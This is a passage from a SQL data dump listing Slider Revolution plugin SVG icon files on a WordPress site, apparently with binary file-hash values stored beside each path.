vL9$Il','',0,'?'),('|ZE3~PCX%','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-key.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-key.svg',0,'4.,GK\\i@\"','4.,GK\\i@\"','M4eq\Z~.Vfΐ_9t','',0,'?'),('-kRO^','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-money.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-money.svg',0,' ݡ؇\Zl',' ݡ؇\Zl','Y=\"!\' ?j#?','',0,'?'),('v3cAkaƎa\Z','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-money2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hand-money2.svg',0,'Yy\rpC','Yy\rpC','\r :t6b!fw \\/EΩnS','',0,'?'),('SErUx\\','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/handshake.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/handshake.svg',0,' v&\ZHR',' v&\ZHR','}`lW\rz(zqLmQk&ʘV','ZA>k&ʘV','8ý\\^\'(+{y谥\r','',0,'?'),('ԧb\\)zq\"?P','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hat.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hat.svg',0,'PF5=#DP\\','PF5=#DP\\',' lӳʬL;g?\n ','',0,'?'),('>;kۉ8?','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-arrows.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-arrows.svg',0,'@)mzY膐\\ԛh','@)mzY膐\\ԛh','*\'WQ[i%J{t=DPgc%;]','',0,'?'),('S7{&ϳVQ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-battery.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-battery.svg',0,'E\"ǻ#k','E\"ǻ#k','gUQP\\0wʪ~8','',0,'?'),('.ٹGsO7','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-check.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-check.svg',0,'?2nP[<','?2nP[<','IAE☪{88:`}uTyD&','',0,'?'),('m4?(Pri}','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-compass.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-compass.svg',0,'WA5sX &z','WA5sX &z','<\nUR\nrWވZXĕ','',0,'?'),('Pu]`;&n','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-dollar.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-dollar.svg',0,'AiS6k&:o','AiS6k&:o','5D5y\0ƈ0I&rZAY=d','',0,'?'),('5q͌Afcl','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-exclamation.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-exclamation.svg',0,'ޛnJπ\\0ǂ_|','ޛnJπ\\0ǂ_|','Ld)o`1`} È|HDB-','',0,'?'),('h6!{\rz','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-flash.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-flash.svg',0,'uE-OҶ\Zkk','uE-OҶ\Zkk','Uxm9g H_yop9 K_kN','',0,'?'),('Nf\n2n@4bhG','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-gauge.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-gauge.svg',0,'eMGL','eMGL',' \nFIpN{d74E?ⲥK>q','',0,'?'),('J\0B\r','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-gears.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-gears.svg',0,'?S`(ԢX','?S`(ԢX','cI|(1T,E}g/֫','',0,'?'),('8W6F\' x','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-hourglass.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-hourglass.svg',0,'>eG0Ѻ\r','>eG0Ѻ\r','1.vHB0&pe1J\\G\"','',0,'?'),('?D핅F[< ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-idea.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-idea.svg',0,' RB\r*mw8',' RB\r*mw8','\'s)5Lh/ 35*xtb','',0,'?'),('zNľb{gel>','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-question.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-question.svg',0,'vS\Zz\Z','vS\Zz\Z','Վ2X w[fzٍ} ','',0,'?'),('CزdWW$w','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-structure.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-structure.svg',0,'nbiUI','nbiUI','6z;.O |oؠ/Qґ ;Gh','',0,'?'),('\'+.F`vz>','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head.svg',0,'+O]','+O]','FZ+Ҁty/0op:aq^I','',0,'?'),('\0\"{s :','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/headquarters.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/headquarters.svg',0,'!*5z<>?2','!*5z<>?2',').fٖtS̐c&?\n{S琮','',0,'?'),('q6br6*','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hourglass.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hourglass.svg',0,'Iqq?2S+c','Iqq?2S+c','@i?WhslM\'ѩ[:2','',0,'?'),('\ZkFv&cg:','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hours.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hours.svg',0,'U?gPAL1.','U?gPAL1.','rۊX_Yȕr9n7V\\\rL','',0,'?'),('\nF xv*?/','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/incoming.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/incoming.svg',0,'B1;hEG jȴ','B1;hEG jȴ','4\\6m0, @d+F\"^vͶsH̯_','',0,'?'),('fahֲ`;','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/ingots.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/ingots.svg',0,'2*z>2','2*z>2','T)}?f3[Ѹ$wZ','',0,'?'),('\0Kqwn','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/key.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/key.svg',0,'*h>P: ','*h>P: ','¼#35?hщ%','',0,'?'),('\"#pI~\'','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/key2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/key2.svg',0,'o\'I`O6%','o\'I`O6%','6tÀRdc+αҠ^=','',0,'?'),('@\rr!Xێ9{T','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/keyboard.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/keyboard.svg',0,'+S䃺Mo<2>','+S䃺Mo<2>','kP$ώ=w 4{C\'\ZLxVi*','',0,'?'),('}٠G=D','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/label.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/label.svg',0,'5WnGT>','5WnGT>','_LF\ZQxws21c잓+R','',0,'?'),('^U|fH^k\\','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lamp.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lamp.svg',0,'?;# pá ','?;# pá ','0\'Qi|c/j 0(\\ߧ','',0,'?'),('#c#Bk b-,Lt','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-article.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-article.svg',0,'iԇ|!HG<','iԇ|!HG<','XcaL+Dg:6Քt\'8_T','',0,'?'),('y^eI8 8HP','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-cart.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-cart.svg',0,'K-k˞<\0','K-k˞<\0','}\0w/ TAxz+~LYo.Zy','',0,'?'),('G8C +{','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-chart.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-chart.svg',0,'p%hKJL|','p%hKJL|','P\Z$Q\'¨4v}Y\rKj( ','',0,'?'),('{Nk2 x','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-chart2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-chart2.svg',0,'{EMPqr)̼6','{EMPqr)̼6','f?`df6\\t;R`E3d\Zx#','',0,'?'),('m݅\"恅t )B','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-diagram.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-diagram.svg',0,'[ѥͤ','[ѥͤ','2\r\'}%a BW̝x\\','',0,'?'),('[>\\%/Xߨ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-envelope.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-envelope.svg',0,'@z ]Do6,8','@z ]Do6,8','{T*니\rn$bwkw#Ū)&','',0,'?'),('UrC?Iؒ+A\0','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-finance.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-finance.svg',0,'}u),mv','}u),mv','ԦZ-8[81< -m;ʆ','',0,'?'),('qH*tG WXz{m','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-privacy.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-privacy.svg',0,'އs쵭As,e','އs쵭As,e','hvͼB #+- PG6gk','',0,'?'),('M|R\\Юcv','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-settings.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-settings.svg',0,'3ߪr@#CW','3ߪr@#CW','@Z)i\rXPiY-','',0,'?'),('zp#>)4','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-user.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-user.svg',0,'2MX,\"J96','2MX,\"J96','\rj7I8fr6R̠;VD\Z1M','',0,'?'),('_Zlͭz`','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop.svg',0,'Po]|\r','Po]|\r','Ӣ9\\MϏҜD39MQ8%','',0,'?'),('2J4SE,F![','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lightbulb-green.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lightbulb-green.svg',0,'.nQ{z\\VT','.nQ{z\\VT','ui\"c~V \n!|[','',0,'?'),('F\r,@>\0Ord','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lightbulb.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lightbulb.svg',0,'-YrFNO֮ ','-YrFNO֮ ','c*\nߡXLpKHo=I','',0,'?'),('\n\Z` ;O#','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lightning.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lightning.svg',0,'HU\r(:\rM','HU\r(:\rM','Aй6\Z]!:p.W\"ad>','',0,'?'),('z -;ne','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/like.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/like.svg',0,'k6a5TS|6 ','k6a5TS|6 ','m7%YV“XX1${| B\0h','',0,'?'),('q(q, A','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lock.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lock.svg',0,'RjX=?Fh','RjX=?Fh',',L Yi1{0E<@gOd','',0,'?'),('WʰQaƙhW','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/magnet-money.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/magnet-money.svg',0,' ތm%M',' ތm%M','$YIsҕ,1/\"*=6!C','',0,'?'),('\ZR@v PN','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/magnifying-glass.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/magnifying-glass.svg',0,'q#z','q#z','E޲!d d\n!p)','',0,'?'),('_U$=923 ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager-globe.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager-globe.svg',0,'~j9Pu\0','~j9Pu\0','N\rG`nAI{|]i{ӹ\Z','',0,'?'),('\"VIwk>m','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager-idea.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager-idea.svg',0,'ч#U¹l?','ч#U¹l?','\\\"SjZjh6[f)e','',0,'?'),('KW\\[/ 1\0','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager01.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager01.svg',0,'IdҾ*m','IdҾ*m','Hvt#)Ɯ PE','',0,'?'),('\n5d?Y:c=h','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager02.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/manager02.svg',0,'YxlJ\r\\','YxlJ\r\\',']R2t.5tٺMNj \"SUq~\"','',0,'?'),('ҊѺR=\Z \n_','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/meditation.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/meditation.svg',0,'Uk@e\"','Uk@e\"','BΗe3Ljpxzq\'&','',0,'?'),('lPe5ض-@\0','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/megaphone.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/megaphone.svg',0,'2)D??MRh','2)D??MRh','[:i4`]#m\\0.900-oP5\0H','',0,'?'),('Nx`z','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money-growth.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money-growth.svg',0,'|BF','|BF','|)v.ܤOHGO\\zl!Z´6','',0,'?'),('z G1e Rx h','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money-scales.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money-scales.svg',0,' W\'쾏',' W\'쾏','\rPG_9.ksD\0`C3 !<','',0,'?'),('G>s߼zϐ@','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money.svg',0,'5վR8\\5','5վR8\\5','5.W&e!P;):Y!C','',0,'?'),('6sJ_D','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money2.svg',0,'J㱸9Nb','J㱸9Nb','۸/șHcE','',0,'?'),('HR%N_sm~4hf','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money3.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money3.svg',0,'GJc_(@ ','GJc_(@ ','[ 7#S v)LG#y\0jZ|x?[','',0,'?'),('U@W;(M%','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money4.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money4.svg',0,'JUy r(랏','JUy r(랏','V(07?&VͰֆ~/\n\r 觮V|`e','',0,'?'),('۳7 8t<','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money5.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money5.svg',0,'\0;1{^72','\0;1{^72','XC&=K2;;`A=\"n','',0,'?'),('X\ZZa݌\r','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money6.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/money6.svg',0,'̻Ԇp>$\r)','̻Ԇp>$\r)','9Bp)Cߍ!2<\rLLT','',0,'?'),('Vdj\r$NdtF','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/monitor.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/monitor.svg',0,'P$S$;.c','P$S$;.c','\rۂӋt4B\\?8 M&[<ֆA꣑','',0,'?'),('ƓGX9=9\r','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/mouse.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/mouse.svg',0,'ru \\10`?','ru \\10`?','zi_qȇ`te5Yp\n2,۱c','',0,'?'),('ON~5—2:','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/nest-money.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/nest-money.svg',0,'ұM|\'C\'V','ұM|\'C\'V','-}]\Z%޸\r*$ԹOU\rEY','',0,'?'),('R@b$tJx]Q','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/newspaper-jobs.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/newspaper-jobs.svg',0,'|ʅ\0LN','|ʅ\0LN','ӗdV !/j1W)H5#\0r ','',0,'?'),('E_kKuvo2','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/newspaper-pen.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/newspaper-pen.svg',0,'҆ 3rPn','҆ 3rPn','ɥJ!hH7%Z\"HS;$0aӟai9','',0,'?'),(' yo6=6\'Ț(','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/newspaper.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/newspaper.svg',0,'h.ڼ۟k0','h.ڼ۟k0','cWvp l=,WT=h+','',0,'?'),('̝B%Nk','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/note-paper.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/note-paper.svg',0,'S6%7G%B','S6%7G%B','1Ux|!⟏n9IxdT:','',0,'?'),('7M}AT Hf','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/office-chair.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/office-chair.svg',0,'y\rƽ1<m5~','y\rƽ1<m5~','^n3\"ڼ82- E@a7_m[','',0,'?'),('qn(\nև!','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/open-sign.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/open-sign.svg',0,'ˡ\\L;\\\\g','ˡ\\L;\\\\g','\ZShKa>V,=}8USWc<U','',0,'?'),('O,.淎\n?iY','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/outgoing.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/outgoing.svg',0,'>_b73','>_b73','tȎ*`JJ֕kG s#g','',0,'?'),('Dc\'d_ȜX','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/paper-clip.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/paper-clip.svg',0,'\ZMZH(Jj','\ZMZH(Jj','JS^廊j5w;#--','',0,'?'),('ןz =Z y','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/paper-plane.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/paper-plane.svg',0,'\ZMZH(Jj','\ZMZH(Jj','JS^廊j5w;#--','',0,'?'),('y-?bN _','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pen.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pen.svg',0,'u t Of[-','u t Of[-','ÊK 4c#2?|VR\nO->ע{','',0,'?'),('{1rf|!l\r8','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pen2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pen2.svg',0,'`g0|&Jg','`g0|&Jg','t&فXH%hu\"wАVH@ ','',0,'?'),('D93Wd#','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pencil.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pencil.svg',0,'&|❝,f:qCYL;','&|❝,f:qCYL;','Dؒy[vQq~λrRS','',0,'?'),('QJf R{E','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pens-pencils.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/pens-pencils.svg',0,'6GΪT','6GΪT','\\g?+%0D3p\rU H7Nj͗k','',0,'?'),('j,ΐI}\'u,','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-arrows06.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-arrows06.svg',0,'vOH%,3}䤎LZ','vOH%,3}䤎LZ','\r1vO_<х(% {ub','',0,'?'),('q})|gֵ h ~&','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-gears.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-gears.svg',0,'Ě!H?O','Ě!H?O','E]дerV6*(;','',0,'?'),('E,UuuEt66','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-handshake.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-handshake.svg',0,'UP>ZvB$','UP>ZvB$','m-4тdɜ3p.6x DLT[','',0,'?'),('`Y\"V*','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-idea.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-idea.svg',0,'Ɏ#-X2','Ɏ#-X2','>%ݧ\"\"nXjQ:8','',0,'?'),(' whʫL','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-meeting.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-meeting.svg',0,'4V6tX#.8`X','4V6tX#.8`X','1$b\r7$^Fx} ;!361','',0,'?'),('7.?>F2;','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-meeting02.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-meeting02.svg',0,'n ;qa','n ;qa','XCJ|` ]0yW0J5hxR,~','',0,'?'),('WO P6e','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-search01.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-search01.svg',0,'_\04OV\"!','_\04OV\"!','E-}a!U>Vz߸tqP1Z\"%','',0,'?'),('Q/[ؔ\nF(0e','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-search02.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-search02.svg',0,'wH|}\r\nM_\"Io','wH|}\r\nM_\"Io','nbs)+\\۳r|c&7@','',0,'?'),('욗=͔6m\0','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure.svg',0,'XjfE* # [','XjfE* # [','$KU\n}w`\"Rp#%>6$B*=ǎ','',0,'?'),('j:P','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure01.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure01.svg',0,'| adD!I','| adD!I','dʭ7#Q\"%‚Mz3\\\0wx','',0,'?'),('j[ͫbF','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure02.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure02.svg',0,'x`CsWj','x`CsWj','\ZRӧ>c.V\0hWU_\n v[','',0,'?'),('l6zZ','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure03.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure03.svg',0,'C4I1ɡFT\'SF','C4I1ɡFT\'SF','9)<;ǵ$c@Klceug%X\Z@G\Z','',0,'?'),('bJȨCK','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure04.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure04.svg',0,'x>8s f&}','x>8s f&}','~J|5iK=`H불GyrE6u1j&t','',0,'?'),('Z[f/}bI\'','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/periscopemoney.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/periscopemoney.svg',0,'H.l􂁄*d','H.l􂁄*d','4 \r-_\";OAx_P','',0,'?'),('>CK$z9b','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows01.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows01.svg',0,'I )Zf\\n','I )Zf\\n','V{Tr*+o^)J{rWY\'','',0,'?'),('T{bǸP-Zr','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows012.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows012.svg',0,'ش:\n\"zJ','ش:\n\"zJ','\n,3DM.jk0>7','',0,'?'),('\'cdL8$8','wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows02.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-arrows02.svg',0,' {>O#v^@',' 